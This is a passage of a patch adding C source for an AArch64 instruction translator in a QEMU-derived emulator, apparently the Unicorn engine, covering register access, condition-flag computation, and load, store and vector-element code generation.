TCG_AREG0, + offsetof(CPUARMState, exclusive_test), "exclusive_test"); + cpu_exclusive_info = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_info), "exclusive_info"); +#endif +} + +#if 0 +void aarch64_cpu_dump_state(CPUState *cs, FILE *f, + fprintf_function cpu_fprintf, int flags) +{ + ARMCPU *cpu = ARM_CPU(cs); + CPUARMState *env = &cpu->env; + uint32_t psr = 
pstate_read(env); + int i; + + cpu_fprintf(f, "PC=%016"PRIx64" SP=%016"PRIx64"\n", + env->pc, env->xregs[31]); + for (i = 0; i < 31; i++) { + cpu_fprintf(f, "X%02d=%016"PRIx64, i, env->xregs[i]); + if ((i % 4) == 3) { + cpu_fprintf(f, "\n"); + } else { + cpu_fprintf(f, " "); + } + } + cpu_fprintf(f, "PSTATE=%08x (flags %c%c%c%c)\n", + psr, + psr & PSTATE_N ? 'N' : '-', + psr & PSTATE_Z ? 'Z' : '-', + psr & PSTATE_C ? 'C' : '-', + psr & PSTATE_V ? 'V' : '-'); + cpu_fprintf(f, "\n"); + + if (flags & CPU_DUMP_FPU) { + int numvfpregs = 32; + for (i = 0; i < numvfpregs; i += 2) { + uint64_t vlo = float64_val(env->vfp.regs[i * 2]); + uint64_t vhi = float64_val(env->vfp.regs[(i * 2) + 1]); + cpu_fprintf(f, "q%02d=%016" PRIx64 ":%016" PRIx64 " ", + i, vhi, vlo); + vlo = float64_val(env->vfp.regs[(i + 1) * 2]); + vhi = float64_val(env->vfp.regs[((i + 1) * 2) + 1]); + cpu_fprintf(f, "q%02d=%016" PRIx64 ":%016" PRIx64 "\n", + i + 1, vhi, vlo); + } + cpu_fprintf(f, "FPCR: %08x FPSR: %08x\n", + vfp_get_fpcr(env), vfp_get_fpsr(env)); + } +} +#endif + +void gen_a64_set_pc_im(DisasContext *s, uint64_t val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_pc, val); +} + +static void gen_exception_internal(DisasContext *s, int excp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); + + assert(excp_is_internal(excp)); + gen_helper_exception_internal(tcg_ctx, tcg_ctx->cpu_env, tcg_excp); + tcg_temp_free_i32(tcg_ctx, tcg_excp); +} + +static void gen_exception(DisasContext *s, int excp, uint32_t syndrome) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); + TCGv_i32 tcg_syn = tcg_const_i32(tcg_ctx, syndrome); + + gen_helper_exception_with_syndrome(tcg_ctx, tcg_ctx->cpu_env, tcg_excp, tcg_syn); + tcg_temp_free_i32(tcg_ctx, tcg_syn); + tcg_temp_free_i32(tcg_ctx, tcg_excp); +} + +static void gen_exception_internal_insn(DisasContext *s, int offset, int excp) +{ + 
gen_a64_set_pc_im(s, s->pc - offset); + gen_exception_internal(s, excp); + s->is_jmp = DISAS_EXC; +} + +static void gen_exception_insn(DisasContext *s, int offset, int excp, + uint32_t syndrome) +{ + gen_a64_set_pc_im(s, s->pc - offset); + gen_exception(s, excp, syndrome); + s->is_jmp = DISAS_EXC; +} + +static void gen_ss_advance(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* If the singlestep state is Active-not-pending, advance to + * Active-pending. + */ + if (s->ss_active) { + s->pstate_ss = 0; + gen_helper_clear_pstate_ss(tcg_ctx, tcg_ctx->cpu_env); + } +} + +static void gen_step_complete_exception(DisasContext *s) +{ + /* We just completed step of an insn. Move from Active-not-pending + * to Active-pending, and then also take the swstep exception. + * This corresponds to making the (IMPDEF) choice to prioritize + * swstep exceptions over asynchronous exceptions taken to an exception + * level where debug is disabled. This choice has the advantage that + * we do not need to maintain internal state corresponding to the + * ISV/EX syndrome bits between completion of the step and generation + * of the exception, and our syndrome information is always correct. 
+ */ + gen_ss_advance(s); + gen_exception(s, EXCP_UDEF, syn_swstep(s->ss_same_el, 1, s->is_ldex)); + s->is_jmp = DISAS_EXC; +} + +static inline bool use_goto_tb(DisasContext *s, int n, uint64_t dest) +{ + /* No direct tb linking with singlestep (either QEMU's or the ARM + * debug architecture kind) or deterministic io + */ + if (s->singlestep_enabled || s->ss_active || (s->tb->cflags & CF_LAST_IO)) { + return false; + } + + /* Only link tbs from inside the same guest page */ + if ((s->tb->pc & TARGET_PAGE_MASK) != (dest & TARGET_PAGE_MASK)) { + return false; + } + + return true; +} + +static inline void gen_goto_tb(DisasContext *s, int n, uint64_t dest) +{ + TranslationBlock *tb; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + tb = s->tb; + if (use_goto_tb(s, n, dest)) { + tcg_gen_goto_tb(tcg_ctx, n); + gen_a64_set_pc_im(s, dest); + tcg_gen_exit_tb(tcg_ctx, (intptr_t)tb + n); + s->is_jmp = DISAS_TB_JUMP; + } else { + gen_a64_set_pc_im(s, dest); + if (s->ss_active) { + gen_step_complete_exception(s); + } else if (s->singlestep_enabled) { + gen_exception_internal(s, EXCP_DEBUG); + } else { + tcg_gen_exit_tb(tcg_ctx, 0); + s->is_jmp = DISAS_TB_JUMP; + } + } +} + +static void unallocated_encoding(DisasContext *s) +{ + /* Unallocated and reserved encodings are uncategorized */ + gen_exception_insn(s, 4, EXCP_UDEF, syn_uncategorized()); +} + +#define unsupported_encoding(s, insn) \ + do { \ + qemu_log_mask(LOG_UNIMP, \ + "%s:%d: unsupported instruction encoding 0x%08x " \ + "at pc=%016" PRIx64 "\n", \ + __FILE__, __LINE__, insn, s->pc - 4); \ + unallocated_encoding(s); \ + } while (0); + +static void init_tmp_a64_array(DisasContext *s) +{ +#ifdef CONFIG_DEBUG_TCG + int i; + for (i = 0; i < ARRAY_SIZE(s->tmp_a64); i++) { + TCGV_UNUSED_I64(s->tmp_a64[i]); + } +#endif + s->tmp_a64_count = 0; +} + +static void free_tmp_a64(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int i; + for (i = 0; i < s->tmp_a64_count; i++) { + tcg_temp_free_i64(tcg_ctx, s->tmp_a64[i]); + 
} + init_tmp_a64_array(s); +} + +static TCGv_i64 new_tmp_a64(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + assert(s->tmp_a64_count < TMP_A64_MAX); + return s->tmp_a64[s->tmp_a64_count++] = tcg_temp_new_i64(tcg_ctx); +} + +static TCGv_i64 new_tmp_a64_zero(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 t = new_tmp_a64(s); + tcg_gen_movi_i64(tcg_ctx, t, 0); + return t; +} + +/* + * Register access functions + * + * These functions are used for directly accessing a register in where + * changes to the final register value are likely to be made. If you + * need to use a register for temporary calculation (e.g. index type + * operations) use the read_* form. + * + * B1.2.1 Register mappings + * + * In instruction register encoding 31 can refer to ZR (zero register) or + * the SP (stack pointer) depending on context. In QEMU's case we map SP + * to tcg_ctx->cpu_X[31] and ZR accesses to a temporary which can be discarded. + * This is the point of the _sp forms. + */ +static TCGv_i64 cpu_reg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (reg == 31) { + return new_tmp_a64_zero(s); + } else { + return tcg_ctx->cpu_X[reg]; + } +} + +/* register access for when 31 == SP */ +static TCGv_i64 cpu_reg_sp(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + return tcg_ctx->cpu_X[reg]; +} + +/* read a cpu register in 32bit/64bit mode. Returns a TCGv_i64 + * representing the register contents. This TCGv is an auto-freed + * temporary so it need not be explicitly freed, and may be modified. 
+ */ +static TCGv_i64 read_cpu_reg(DisasContext *s, int reg, int sf) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 v = new_tmp_a64(s); + if (reg != 31) { + if (sf) { + tcg_gen_mov_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); + } else { + tcg_gen_ext32u_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); + } + } else { + tcg_gen_movi_i64(tcg_ctx, v, 0); + } + return v; +} + +static TCGv_i64 read_cpu_reg_sp(DisasContext *s, int reg, int sf) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 v = new_tmp_a64(s); + if (sf) { + tcg_gen_mov_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); + } else { + tcg_gen_ext32u_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); + } + return v; +} + +/* We should have at some point before trying to access an FP register + * done the necessary access check, so assert that + * (a) we did the check and + * (b) we didn't then just plough ahead anyway if it failed. + * Print the instruction pattern in the abort message so we can figure + * out what we need to fix if a user encounters this problem in the wild. + */ +static inline void assert_fp_access_checked(DisasContext *s) +{ +#ifdef CONFIG_DEBUG_TCG + if (unlikely(!s->fp_access_checked || !s->cpacr_fpen)) { + fprintf(stderr, "target-arm: FP access check missing for " + "instruction 0x%08x\n", s->insn); + abort(); + } +#endif +} + +/* Return the offset into CPUARMState of an element of specified + * size, 'element' places in from the least significant end of + * the FP/vector register Qn. + */ +static inline int vec_reg_offset(DisasContext *s, int regno, + int element, TCGMemOp size) +{ + int offs = offsetof(CPUARMState, vfp.regs[regno * 2]); +#ifdef HOST_WORDS_BIGENDIAN + /* This is complicated slightly because vfp.regs[2n] is + * still the low half and vfp.regs[2n+1] the high half + * of the 128 bit vector, even on big endian systems. + * Calculate the offset assuming a fully bigendian 128 bits, + * then XOR to account for the order of the two 64 bit halves. 
+ */ + offs += (16 - ((element + 1) * (1 << size))); + offs ^= 8; +#else + offs += element * (1 << size); +#endif + assert_fp_access_checked(s); + return offs; +} + +/* Return the offset into CPUARMState of a slice (from + * the least significant end) of FP register Qn (ie + * Dn, Sn, Hn or Bn). + * (Note that this is not the same mapping as for A32; see cpu.h) + */ +static inline int fp_reg_offset(DisasContext *s, int regno, TCGMemOp size) +{ + int offs = offsetof(CPUARMState, vfp.regs[regno * 2]); +#ifdef HOST_WORDS_BIGENDIAN + offs += (8 - (1 << size)); +#endif + assert_fp_access_checked(s); + return offs; +} + +/* Offset of the high half of the 128 bit vector Qn */ +static inline int fp_reg_hi_offset(DisasContext *s, int regno) +{ + assert_fp_access_checked(s); + return offsetof(CPUARMState, vfp.regs[regno * 2 + 1]); +} + +/* Convenience accessors for reading and writing single and double + * FP registers. Writing clears the upper parts of the associated + * 128 bit vector register, as required by the architecture. + * Note that unlike the GP register accessors, the values returned + * by the read functions must be manually freed. 
+ */ +static TCGv_i64 read_fp_dreg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 v = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ld_i64(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_64)); + return v; +} + +static TCGv_i32 read_fp_sreg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 v = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_ld_i32(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_32)); + return v; +} + +static void write_fp_dreg(DisasContext *s, int reg, TCGv_i64 v) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + + tcg_gen_st_i64(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_64)); + tcg_gen_st_i64(tcg_ctx, tcg_zero, tcg_ctx->cpu_env, fp_reg_hi_offset(s, reg)); + tcg_temp_free_i64(tcg_ctx, tcg_zero); +} + +static void write_fp_sreg(DisasContext *s, int reg, TCGv_i32 v) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_extu_i32_i64(tcg_ctx, tmp, v); + write_fp_dreg(s, reg, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); +} + +static TCGv_ptr get_fpstatus_ptr(TCGContext *tcg_ctx) +{ + TCGv_ptr statusptr = tcg_temp_new_ptr(tcg_ctx); + int offset; + + /* In A64 all instructions (both FP and Neon) use the FPCR; + * there is no equivalent of the A32 Neon "standard FPSCR value" + * and all operations use vfp.fp_status. + */ + offset = offsetof(CPUARMState, vfp.fp_status); + tcg_gen_addi_ptr(tcg_ctx, statusptr, tcg_ctx->cpu_env, offset); + return statusptr; +} + +/* Set ZF and NF based on a 64 bit result. This is alas fiddlier + * than the 32 bit equivalent. 
+ */ +static inline void gen_set_NZ64(TCGContext *tcg_ctx, TCGv_i64 result) +{ + TCGv_i64 flag = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, flag, result, 0); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_ZF, flag); + tcg_gen_shri_i64(tcg_ctx, flag, result, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_NF, flag); + tcg_temp_free_i64(tcg_ctx, flag); +} + +/* Set NZCV as for a logical operation: NZ as per result, CV cleared. */ +static inline void gen_logic_CC(TCGContext *tcg_ctx, int sf, TCGv_i64 result) +{ + if (sf) { + gen_set_NZ64(tcg_ctx, result); + } else { + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_ZF, result); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_NF, result); + } + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, 0); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); +} + +/* dest = T0 + T1; compute C, N, V and Z flags */ +static void gen_add_CC(DisasContext *s, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (sf) { + TCGv_i64 result, flag, tmp; + result = tcg_temp_new_i64(tcg_ctx); + flag = tcg_temp_new_i64(tcg_ctx); + tmp = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_movi_i64(tcg_ctx, tmp, 0); + tcg_gen_add2_i64(tcg_ctx, result, flag, t0, tmp, t1, tmp); + + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, flag); + + gen_set_NZ64(tcg_ctx, result); + + tcg_gen_xor_i64(tcg_ctx, flag, result, t0); + tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); + tcg_gen_andc_i64(tcg_ctx, flag, flag, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); + tcg_gen_shri_i64(tcg_ctx, flag, flag, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, flag); + + tcg_gen_mov_i64(tcg_ctx, dest, result); + tcg_temp_free_i64(tcg_ctx, result); + tcg_temp_free_i64(tcg_ctx, flag); + } else { + /* 32 bit arithmetic */ + TCGv_i32 t0_32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t1_32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + tcg_gen_trunc_i64_i32(tcg_ctx, t0_32, 
t0); + tcg_gen_trunc_i64_i32(tcg_ctx, t1_32, t1); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0_32, tmp, t1_32, tmp); + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); + tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); + tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); + + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, t0_32); + tcg_temp_free_i32(tcg_ctx, t1_32); + } +} + +/* dest = T0 - T1; compute C, N, V and Z flags */ +static void gen_sub_CC(DisasContext *s, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (sf) { + /* 64 bit arithmetic */ + TCGv_i64 result, flag, tmp; + + result = tcg_temp_new_i64(tcg_ctx); + flag = tcg_temp_new_i64(tcg_ctx); + tcg_gen_sub_i64(tcg_ctx, result, t0, t1); + + gen_set_NZ64(tcg_ctx, result); + + tcg_gen_setcond_i64(tcg_ctx, TCG_COND_GEU, flag, t0, t1); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, flag); + + tcg_gen_xor_i64(tcg_ctx, flag, result, t0); + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); + tcg_gen_and_i64(tcg_ctx, flag, flag, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); + tcg_gen_shri_i64(tcg_ctx, flag, flag, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, flag); + tcg_gen_mov_i64(tcg_ctx, dest, result); + tcg_temp_free_i64(tcg_ctx, flag); + tcg_temp_free_i64(tcg_ctx, result); + } else { + /* 32 bit arithmetic */ + TCGv_i32 t0_32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t1_32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tmp; + + tcg_gen_trunc_i64_i32(tcg_ctx, t0_32, t0); + tcg_gen_trunc_i64_i32(tcg_ctx, t1_32, t1); + tcg_gen_sub_i32(tcg_ctx, tcg_ctx->cpu_NF, t0_32, t1_32); + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_setcond_i32(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_CF, t0_32, t1_32); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, 
tcg_ctx->cpu_NF, t0_32); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); + tcg_temp_free_i32(tcg_ctx, t0_32); + tcg_temp_free_i32(tcg_ctx, t1_32); + tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); + } +} + +/* dest = T0 + T1 + CF; do not compute flags. */ +static void gen_adc(DisasContext *s, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 flag = tcg_temp_new_i64(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, flag, tcg_ctx->cpu_CF); + tcg_gen_add_i64(tcg_ctx, dest, t0, t1); + tcg_gen_add_i64(tcg_ctx, dest, dest, flag); + tcg_temp_free_i64(tcg_ctx, flag); + + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, dest, dest); + } +} + +/* dest = T0 + T1 + CF; compute C, N, V and Z flags. */ +static void gen_adc_CC(DisasContext *s, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (sf) { + TCGv_i64 result, cf_64, vf_64, tmp; + result = tcg_temp_new_i64(tcg_ctx); + cf_64 = tcg_temp_new_i64(tcg_ctx); + vf_64 = tcg_temp_new_i64(tcg_ctx); + tmp = tcg_const_i64(tcg_ctx, 0); + + tcg_gen_extu_i32_i64(tcg_ctx, cf_64, tcg_ctx->cpu_CF); + tcg_gen_add2_i64(tcg_ctx, result, cf_64, t0, tmp, cf_64, tmp); + tcg_gen_add2_i64(tcg_ctx, result, cf_64, result, cf_64, t1, tmp); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, cf_64); + gen_set_NZ64(tcg_ctx, result); + + tcg_gen_xor_i64(tcg_ctx, vf_64, result, t0); + tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); + tcg_gen_andc_i64(tcg_ctx, vf_64, vf_64, tmp); + tcg_gen_shri_i64(tcg_ctx, vf_64, vf_64, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, vf_64); + + tcg_gen_mov_i64(tcg_ctx, dest, result); + + tcg_temp_free_i64(tcg_ctx, tmp); + tcg_temp_free_i64(tcg_ctx, vf_64); + tcg_temp_free_i64(tcg_ctx, cf_64); + tcg_temp_free_i64(tcg_ctx, result); + } else { + TCGv_i32 t0_32, t1_32, tmp; + t0_32 = 
tcg_temp_new_i32(tcg_ctx); + t1_32 = tcg_temp_new_i32(tcg_ctx); + tmp = tcg_const_i32(tcg_ctx, 0); + + tcg_gen_trunc_i64_i32(tcg_ctx, t0_32, t0); + tcg_gen_trunc_i64_i32(tcg_ctx, t1_32, t1); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0_32, tmp, tcg_ctx->cpu_CF, tmp); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t1_32, tmp); + + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); + tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); + tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); + + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, t1_32); + tcg_temp_free_i32(tcg_ctx, t0_32); + } +} + +/* + * Load/Store generators + */ + +/* + * Store from GPR register to memory. + */ +static void do_gpr_st_memidx(DisasContext *s, TCGv_i64 source, + TCGv_i64 tcg_addr, int size, int memidx) +{ + g_assert(size <= 3); + tcg_gen_qemu_st_i64(s->uc, source, tcg_addr, memidx, MO_TE + size); +} + +static void do_gpr_st(DisasContext *s, TCGv_i64 source, + TCGv_i64 tcg_addr, int size) +{ + do_gpr_st_memidx(s, source, tcg_addr, size, get_mem_index(s)); +} + +/* + * Load from memory to GPR register + */ +static void do_gpr_ld_memidx(DisasContext *s, TCGv_i64 dest, TCGv_i64 tcg_addr, + int size, bool is_signed, bool extend, int memidx) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGMemOp memop = MO_TE + size; + + g_assert(size <= 3); + + if (is_signed) { + memop += MO_SIGN; + } + + tcg_gen_qemu_ld_i64(s->uc, dest, tcg_addr, memidx, memop); + + if (extend && is_signed) { + g_assert(size < 3); + tcg_gen_ext32u_i64(tcg_ctx, dest, dest); + } +} + +static void do_gpr_ld(DisasContext *s, TCGv_i64 dest, TCGv_i64 tcg_addr, + int size, bool is_signed, bool extend) +{ + do_gpr_ld_memidx(s, dest, tcg_addr, size, is_signed, extend, + get_mem_index(s)); +} + +/* + * Store from FP 
register to memory + */ +static void do_fp_st(DisasContext *s, int srcidx, TCGv_i64 tcg_addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* This writes the bottom N bits of a 128 bit wide vector to memory */ + TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_offset(s, srcidx, MO_64)); + if (size < 4) { + tcg_gen_qemu_st_i64(s->uc, tmp, tcg_addr, get_mem_index(s), MO_TE + size); + } else { + TCGv_i64 tcg_hiaddr = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_st_i64(s->uc, tmp, tcg_addr, get_mem_index(s), MO_TEQ); + tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_hi_offset(s, srcidx)); + tcg_gen_addi_i64(tcg_ctx, tcg_hiaddr, tcg_addr, 8); + tcg_gen_qemu_st_i64(s->uc, tmp, tcg_hiaddr, get_mem_index(s), MO_TEQ); + tcg_temp_free_i64(tcg_ctx, tcg_hiaddr); + } + + tcg_temp_free_i64(tcg_ctx, tmp); +} + +/* + * Load from memory to FP register + */ +static void do_fp_ld(DisasContext *s, int destidx, TCGv_i64 tcg_addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* This always zero-extends and writes to a full 128 bit wide vector */ + TCGv_i64 tmplo = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tmphi; + + if (size < 4) { + TCGMemOp memop = MO_TE + size; + tmphi = tcg_const_i64(tcg_ctx, 0); + tcg_gen_qemu_ld_i64(s->uc, tmplo, tcg_addr, get_mem_index(s), memop); + } else { + TCGv_i64 tcg_hiaddr; + tmphi = tcg_temp_new_i64(tcg_ctx); + tcg_hiaddr = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_qemu_ld_i64(s->uc, tmplo, tcg_addr, get_mem_index(s), MO_TEQ); + tcg_gen_addi_i64(tcg_ctx, tcg_hiaddr, tcg_addr, 8); + tcg_gen_qemu_ld_i64(s->uc, tmphi, tcg_hiaddr, get_mem_index(s), MO_TEQ); + tcg_temp_free_i64(tcg_ctx, tcg_hiaddr); + } + + tcg_gen_st_i64(tcg_ctx, tmplo, tcg_ctx->cpu_env, fp_reg_offset(s, destidx, MO_64)); + tcg_gen_st_i64(tcg_ctx, tmphi, tcg_ctx->cpu_env, fp_reg_hi_offset(s, destidx)); + + tcg_temp_free_i64(tcg_ctx, tmplo); + tcg_temp_free_i64(tcg_ctx, tmphi); +} + +/* + * Vector load/store helpers. 
+ * + * The principal difference between this and a FP load is that we don't + * zero extend as we are filling a partial chunk of the vector register. + * These functions don't support 128 bit loads/stores, which would be + * normal load/store operations. + * + * The _i32 versions are useful when operating on 32 bit quantities + * (eg for floating point single or using Neon helper functions). + */ + +/* Get value of an element within a vector register */ +static void read_vec_element(DisasContext *s, TCGv_i64 tcg_dest, int srcidx, + int element, TCGMemOp memop) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int vect_off = vec_reg_offset(s, srcidx, element, memop & MO_SIZE); + switch (memop) { + case MO_8: + tcg_gen_ld8u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_16: + tcg_gen_ld16u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_32: + tcg_gen_ld32u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_8|MO_SIGN: + tcg_gen_ld8s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_16|MO_SIGN: + tcg_gen_ld16s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_32|MO_SIGN: + tcg_gen_ld32s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_64: + case MO_64|MO_SIGN: + tcg_gen_ld_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + default: + g_assert_not_reached(); + } +} + +static void read_vec_element_i32(DisasContext *s, TCGv_i32 tcg_dest, int srcidx, + int element, TCGMemOp memop) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int vect_off = vec_reg_offset(s, srcidx, element, memop & MO_SIZE); + switch (memop) { + case MO_8: + tcg_gen_ld8u_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_16: + tcg_gen_ld16u_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_8|MO_SIGN: + tcg_gen_ld8s_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_16|MO_SIGN: + tcg_gen_ld16s_i32(tcg_ctx, 
tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_32: + case MO_32|MO_SIGN: + tcg_gen_ld_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + default: + g_assert_not_reached(); + } +} + +/* Set value of an element within a vector register */ +static void write_vec_element(DisasContext *s, TCGv_i64 tcg_src, int destidx, + int element, TCGMemOp memop) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int vect_off = vec_reg_offset(s, destidx, element, memop & MO_SIZE); + CPUState *cs; + switch (memop) { + case MO_8: + tcg_gen_st8_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + case MO_16: + tcg_gen_st16_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + case MO_32: + tcg_gen_st32_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + case MO_64: + tcg_gen_st_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + default: + cs = CPU(s->uc->cpu); + cs->exception_index = EXCP_UDEF; + cpu_loop_exit(cs); + break; + } +} + +static void write_vec_element_i32(DisasContext *s, TCGv_i32 tcg_src, + int destidx, int element, TCGMemOp memop) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int vect_off = vec_reg_offset(s, destidx, element, memop & MO_SIZE); + switch (memop) { + case MO_8: + tcg_gen_st8_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + case MO_16: + 